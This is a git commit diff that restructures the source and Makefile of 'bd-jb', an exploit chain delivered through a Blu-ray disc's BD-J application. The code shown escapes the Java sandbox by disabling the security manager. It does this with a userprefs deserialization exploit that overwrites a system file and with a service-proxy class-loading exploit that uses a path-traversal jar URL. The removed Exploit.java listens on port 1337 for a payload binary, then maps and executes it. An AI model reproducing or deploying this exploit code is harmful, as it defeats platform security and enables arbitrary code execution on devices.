Restructure source code and improve Makefile.

.gitignore

@@ -1,4 +1,5 @@
 .idea/
+build/
 tools/
 lib/
 disc/CERTIFICATE/id.bdmv

Makefile

@@ -1,34 +1,57 @@
-CLASSES = \
-	com/bdjb/ExploitXlet.java \
-	com/bdjb/Exploit.java \
-	com/bdjb/ExploitInterface.java \
-	com/bdjb/ExploitUserPrefsImpl.java \
-	com/bdjb/ExploitServiceProxyImpl.java \
-	com/bdjb/IxcProxyImpl.java \
-	com/bdjb/ServiceInterface.java \
-	com/bdjb/ServiceImpl.java \
-	com/bdjb/ProviderAccessorImpl.java \
-	com/bdjb/PayloadClassLoader.java \
-	com/bdjb/Payload.java \
-	com/bdjb/UnsafeInterface.java \
-	com/bdjb/UnsafeJdkImpl.java \
-	com/bdjb/UnsafeSunImpl.java \
-	com/bdjb/API.java \
-	com/bdjb/JIT.java \
-	com/bdjb/Screen.java \
+BUILD = build
+BDMV = bdmv
+DISC = disc
+LIB = lib
+SRC = src
+TOOLS = tools
 
-all:
-	javac com/bdjb/PayloadClassLoaderSerializer.java && java com/bdjb/PayloadClassLoaderSerializer
-	javac -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "lib/rt.jar:lib/bdjstack.jar" $(CLASSES)
-	jar cf disc/BDMV/JAR/00000.jar com/bdjb/*.class com/bdjb/*.ser com/bdjb/bluray.ExploitXlet.perm
-	java -cp "tools/security.jar:tools/bcprov-jdk15-137.jar:tools/tools.jar" net.java.bd.tools.security.BDSigner disc/BDMV/JAR/00000.jar
-	java -jar tools/bdjo.jar bdmv/bdjo.xml disc/BDMV/BDJO/00000.bdjo
-	java -jar tools/MovieObject.jar bdmv/MovieObject.xml disc/BDMV/MovieObject.bdmv
-	java -jar tools/index.jar bdmv/index.xml disc/BDMV/index.bdmv
-	java -jar tools/id.jar bdmv/id.xml disc/CERTIFICATE/id.bdmv
+CLASSES = \
+	$(SRC)/com/bdjb/ExploitXlet.java \
+	$(SRC)/com/bdjb/Exploit.java \
+	$(SRC)/com/bdjb/UnsafeInterface.java \
+	$(SRC)/com/bdjb/UnsafeJdkImpl.java \
+	$(SRC)/com/bdjb/UnsafeSunImpl.java \
+	$(SRC)/com/bdjb/API.java \
+	$(SRC)/com/bdjb/JIT.java \
+	$(SRC)/com/bdjb/Screen.java \
+	$(SRC)/com/bdjb/exploit/sandbox/ExploitSandboxInterface.java \
+	$(SRC)/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java \
+	$(SRC)/com/bdjb/exploit/sandbox/ExploitServiceProxyImpl.java \
+	$(SRC)/com/bdjb/exploit/sandbox/IxcProxyImpl.java \
+	$(SRC)/com/bdjb/exploit/sandbox/ServiceInterface.java \
+	$(SRC)/com/bdjb/exploit/sandbox/ServiceImpl.java \
+	$(SRC)/com/bdjb/exploit/sandbox/ProviderAccessorImpl.java \
+	$(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoader.java \
+	$(SRC)/com/bdjb/exploit/sandbox/Payload.java \
+	$(SRC)/com/bdjb/exploit/kernel/ExploitKernelInterface.java \
+
+JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar"
+
+all: directory serialized classes jar bdmv
+
+directory:
+	mkdir -p $(BUILD)
+
+serialized:
+	javac -d $(BUILD) -sourcepath $(SRC) $(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java
+	java -cp $(BUILD) com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoader.ser
+	rm $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.class
+
+classes:
+	javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(CLASSES)
+
+jar:
+	rm -rf $(BUILD)/jdk
+	cp $(SRC)/com/bdjb/bluray.ExploitXlet.perm $(BUILD)/com/bdjb/bluray.ExploitXlet.perm
+	cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd ..
+	java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar
+
+bdmv:
+	java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo
+	java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv
+	java -jar $(TOOLS)/index.jar $(BDMV)/index.xml $(DISC)/BDMV/index.bdmv
+	java -jar $(TOOLS)/id.jar $(BDMV)/id.xml $(DISC)/CERTIFICATE/id.bdmv
 
 clean:
-	rm -rf jdk/internal/misc/*.class
-	rm -rf com/bdjb/*.class
-	rm -rf com/bdjb/*.ser
+	rm -rf build
 	rm -rf META-INF

com/bdjb/Exploit.java

@@ -1,93 +0,0 @@
-/*
- * Copyright (C) 2021 Andy Nguyen
- *
- * This software may be modified and distributed under the terms
- * of the MIT license.  See the LICENSE file for details.
- */
-
-package com.bdjb;
-
-import java.io.FileOutputStream;
-import java.io.InputStream;
-import java.io.OutputStream;
-import java.net.InetAddress;
-import java.net.ServerSocket;
-import java.net.Socket;
-
-class Exploit implements Runnable {
-  static void init() {
-    Screen.println("[+] bd-jb by theflow");
-
-    Screen.println("[*] Disabling security manager...");
-
-    ExploitInterface[] exploits =
-        new ExploitInterface[] {new ExploitUserPrefsImpl(), new ExploitServiceProxyImpl()};
-
-    for (int i = 0; i < exploits.length; i++) {
-      try {
-        exploits[i].trigger();
-        if (System.getSecurityManager() == null) {
-          break;
-        }
-      } catch (Exception e) {
-        continue;
-      }
-    }
-
-    if (System.getSecurityManager() != null) {
-      Screen.println("[-] Error could not disable security manager.");
-    }
-  }
-
-  static void start() {
-    new Thread(new Exploit()).start();
-  }
-
-  public void run() {
-    if (System.getSecurityManager() != null) {
-      return;
-    }
-
-    try {
-      Screen.println("[*] Installing native API...");
-      API api = API.getInstance();
-
-      Screen.println("[*] Enabling JIT...");
-      JIT jit = JIT.getInstance();
-
-      Screen.println(
-          "[*] Listening for payload on "
-              + InetAddress.getLocalHost().getHostAddress()
-              + ":1337...");
-
-      ServerSocket serverSocket = new ServerSocket(1337);
-      Socket socket = serverSocket.accept();
-
-      Screen.println("[*] Downloading payload...");
-
-      InputStream inputStream = socket.getInputStream();
-      OutputStream outputStream = new FileOutputStream("/OS/HDD/download0/mnt_ada/payload.bin");
-
-      byte[] buf = new byte[8192];
-      int read;
-      while ((read = inputStream.read(buf)) > 0) {
-        outputStream.write(buf, 0, read);
-      }
-
-      outputStream.close();
-      inputStream.close();
-
-      socket.close();
-
-      Screen.println("[*] Mapping payload...");
-      long payload = jit.mapPayload("/OS/HDD/download0/mnt_ada/payload.bin", 0x4000);
-      Screen.println("[+] payload: " + Long.toHexString(payload));
-
-      Screen.println("[*] Executing payload...");
-      int ret = (int) api.call(payload, api.dlsym(API.LIBKERNEL_MODULE_HANDLE, "sceKernelDlsym"));
-      Screen.println("[+] Result: " + ret);
-    } catch (Exception e) {
-      Screen.println("[-] Error: " + e.getMessage());
-    }
-  }
-}

src/com/bdjb/Exploit.java

@@ -0,0 +1,69 @@
+/*
+ * Copyright (C) 2021 Andy Nguyen
+ *
+ * This software may be modified and distributed under the terms
+ * of the MIT license.  See the LICENSE file for details.
+ */
+
+package com.bdjb;
+
+import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
+import com.bdjb.exploit.sandbox.ExploitUserPrefsImpl;
+import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl;
+import com.bdjb.exploit.kernel.ExploitKernelInterface;
+import java.io.FileOutputStream;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.net.InetAddress;
+import java.net.ServerSocket;
+import java.net.Socket;
+
+class Exploit implements Runnable {
+  static void init() {
+    Screen.println("[+] bd-jb by theflow");
+
+    Screen.println("[*] Escaping Java Sandbox...");
+
+    ExploitSandboxInterface[] exploits =
+        new ExploitSandboxInterface[] {new ExploitUserPrefsImpl(), new ExploitServiceProxyImpl()};
+
+    for (int i = 0; i < exploits.length; i++) {
+      try {
+        exploits[i].trigger();
+        if (System.getSecurityManager() == null) {
+          break;
+        }
+      } catch (Exception e) {
+        continue;
+      }
+    }
+
+    if (System.getSecurityManager() != null) {
+      Screen.println("[-] Error could not disable security manager.");
+    }
+  }
+
+  static void start() {
+    new Thread(new Exploit()).start();
+  }
+
+  public void run() {
+    if (System.getSecurityManager() != null) {
+      return;
+    }
+
+    Screen.println("[*] Exploiting kernel...");
+
+    ExploitKernelInterface[] exploits = new ExploitKernelInterface[] {};
+
+    for (int i = 0; i < exploits.length; i++) {
+      try {
+        if (exploits[i].trigger()) {
+          break;
+        }
+      } catch (Exception e) {
+        continue;
+      }
+    }
+  }
+}

src/com/bdjb/exploit/kernel/ExploitKernelInterface.java

@@ -5,8 +5,8 @@
  * of the MIT license.  See the LICENSE file for details.
  */
 
-package com.bdjb;
+package com.bdjb.exploit.kernel;
 
-interface ExploitInterface {
-  public void trigger() throws Exception;
+public interface ExploitKernelInterface {
+  public boolean trigger() throws Exception;
 }

src/com/bdjb/exploit/sandbox/ExploitSandboxInterface.java

@@ -0,0 +1,12 @@
+/*
+ * Copyright (C) 2021 Andy Nguyen
+ *
+ * This software may be modified and distributed under the terms
+ * of the MIT license.  See the LICENSE file for details.
+ */
+
+package com.bdjb.exploit.sandbox;
+
+public interface ExploitSandboxInterface {
+  public boolean trigger() throws Exception;
+}

src/com/bdjb/exploit/sandbox/ExploitServiceProxyImpl.java

@@ -5,7 +5,7 @@
  * of the MIT license.  See the LICENSE file for details.
  */
 
-package com.bdjb;
+package com.bdjb.exploit.sandbox;
 
 import java.io.FileOutputStream;
 import java.io.InputStream;
@@ -16,19 +16,19 @@ import java.security.Provider;
 import java.security.Security;
 
 /** Implementation of the service+proxy exploit. */
-class ExploitServiceProxyImpl implements ExploitInterface {
+public class ExploitServiceProxyImpl implements ExploitSandboxInterface {
   private static final String SERVICE_CLASS_NAME = "com.oracle.security.Service";
 
   private static final String NEW_INSTANCE_METHOD_NAME = "newInstance";
   private static final String NEW_INSTANCE_METHOD_SIGNATURE =
       "(Ljava/lang/Object;)Ljava/lang/Object;";
 
+  private static final String PAYLOAD_CLASS_NAME = "com.bdjb.exploit.sandbox.Payload";
+
   private static final String JAR_URL =
       "file:///app0/bdjstack/lib/ext/../../../../disc/BDMV/JAR/00000.jar";
 
-  private static final String PAYLOAD_CLASS_NAME = "com.bdjb.Payload";
-
-  public void trigger() throws Exception {
+  public boolean trigger() throws Exception {
     // Throw exception if class does not exist.
     Class.forName(SERVICE_CLASS_NAME);
 
@@ -56,5 +56,7 @@ class ExploitServiceProxyImpl implements ExploitInterface {
     // Instantiate the payload class with all permissions to disable the security manager.
     Class payloadClass = urlClassLoader.loadClass(PAYLOAD_CLASS_NAME);
     payloadClass.newInstance();
+
+    return true;
   }
 }

src/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java

@@ -5,7 +5,7 @@
  * of the MIT license.  See the LICENSE file for details.
  */
 
-package com.bdjb;
+package com.bdjb.exploit.sandbox;
 
 import java.io.FileOutputStream;
 import java.io.InputStream;
@@ -14,16 +14,17 @@ import java.io.OutputStream;
 import org.havi.ui.HSceneFactory;
 
 /** Implementation of the userprefs deserialization exploit. */
-class ExploitUserPrefsImpl implements ExploitInterface {
-  private static final String MNT_ADA_USERPREFS = "/OS/HDD/download0/mnt_ada/userprefs";
+public class ExploitUserPrefsImpl implements ExploitSandboxInterface {
+  private static final String USERPREFS_FILE = "/OS/HDD/download0/mnt_ada/userprefs";
 
-  private static final String PAYLOAD_CLASS_LOADER_SER = "/com/bdjb/PayloadClassLoader.ser";
+  private static final String PAYLOAD_CLASS_LOADER_SER_FILE =
+      "/com/bdjb/exploit/sandbox/PayloadClassLoader.ser";
 
-  public void trigger() throws Exception {
+  public boolean trigger() throws Exception {
     try {
       // Overwrite userprefs with a serialized PayloadClassLoader.
-      InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_LOADER_SER);
-      OutputStream outputStream = new FileOutputStream(MNT_ADA_USERPREFS);
+      InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_LOADER_SER_FILE);
+      OutputStream outputStream = new FileOutputStream(USERPREFS_FILE);
 
       byte[] buf = new byte[8192];
       int read;
@@ -42,15 +43,19 @@ class ExploitUserPrefsImpl implements ExploitInterface {
 
         // Instantiate the payload class.
         PayloadClassLoader.getInstance().newPayload();
+
+        return true;
       }
     } finally {
       // Restore userprefs file.
       String[][] preferences = new String[9][];
       preferences[3] = new String[] {"26"};
       ObjectOutputStream outputStream =
-          new ObjectOutputStream(new FileOutputStream(MNT_ADA_USERPREFS));
+          new ObjectOutputStream(new FileOutputStream(USERPREFS_FILE));
       outputStream.writeObject(preferences);
       outputStream.close();
     }
+
+    return false;
   }
 }

src/com/bdjb/exploit/sandbox/IxcProxyImpl.java

@@ -5,7 +5,7 @@
  * of the MIT license.  See the LICENSE file for details.
  */
 
-package com.bdjb;
+package com.bdjb.exploit.sandbox;
 
 import com.sony.gemstack.core.CoreAppContext;
 import com.sony.gemstack.core.CoreIxcClassLoader;

src/com/bdjb/exploit/sandbox/Payload.java

@@ -5,7 +5,7 @@
  * of the MIT license.  See the LICENSE file for details.
  */
 
-package com.bdjb;
+package com.bdjb.exploit.sandbox;
 
 import java.security.AccessController;
 import java.security.PrivilegedActionException;

src/com/bdjb/exploit/sandbox/PayloadClassLoader.java

@@ -5,7 +5,7 @@
  * of the MIT license.  See the LICENSE file for details.
  */
 
-package com.bdjb;
+package com.bdjb.exploit.sandbox;
 
 import java.io.ByteArrayOutputStream;
 import java.io.InputStream;
@@ -19,8 +19,8 @@ import java.security.ProtectionDomain;
 class PayloadClassLoader extends ClassLoader implements Serializable {
   private static final long serialVersionUID = 0x4141414141414141L;
 
-  private static final String PAYLOAD_CLASS_FILE = "/com/bdjb/Payload.class";
-  private static final String PAYLOAD_CLASS_NAME = "com.bdjb.Payload";
+  private static final String PAYLOAD_CLASS_FILE = "/com/bdjb/exploit/sandbox/Payload.class";
+  private static final String PAYLOAD_CLASS_NAME = "com.bdjb.exploit.sandbox.Payload";
 
   private static PayloadClassLoader instance;
 

src/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java

@@ -5,8 +5,9 @@
  * of the MIT license.  See the LICENSE file for details.
  */
 
-package com.bdjb;
+package com.bdjb.exploit.sandbox;
 
+import com.bdjb.exploit.sandbox.PayloadClassLoader;
 import java.io.FileOutputStream;
 import java.io.ObjectOutputStream;
 
@@ -14,8 +15,7 @@ import java.io.ObjectOutputStream;
 class PayloadClassLoaderSerializer {
   public static void main(String[] args) {
     try {
-      ObjectOutputStream objectOutputStream =
-          new ObjectOutputStream(new FileOutputStream("com/bdjb/PayloadClassLoader.ser"));
+      ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream(args[0]));
       objectOutputStream.writeObject(new PayloadClassLoader());
       objectOutputStream.close();
     } catch (Exception e) {

src/com/bdjb/exploit/sandbox/ProviderAccessorImpl.java

@@ -5,7 +5,7 @@
  * of the MIT license.  See the LICENSE file for details.
  */
 
-package com.bdjb;
+package com.bdjb.exploit.sandbox;
 
 import com.oracle.ProviderAccessor;
 import com.oracle.ProviderAdapter;

src/com/bdjb/exploit/sandbox/ServiceImpl.java

@@ -5,7 +5,7 @@
  * of the MIT license.  See the LICENSE file for details.
  */
 
-package com.bdjb;
+package com.bdjb.exploit.sandbox;
 
 import com.oracle.security.Service;
 import java.util.List;

src/com/bdjb/exploit/sandbox/ServiceInterface.java

@@ -5,7 +5,7 @@
  * of the MIT license.  See the LICENSE file for details.
  */
 
-package com.bdjb;
+package com.bdjb.exploit.sandbox;
 
 import java.rmi.Remote;
 import java.rmi.RemoteException;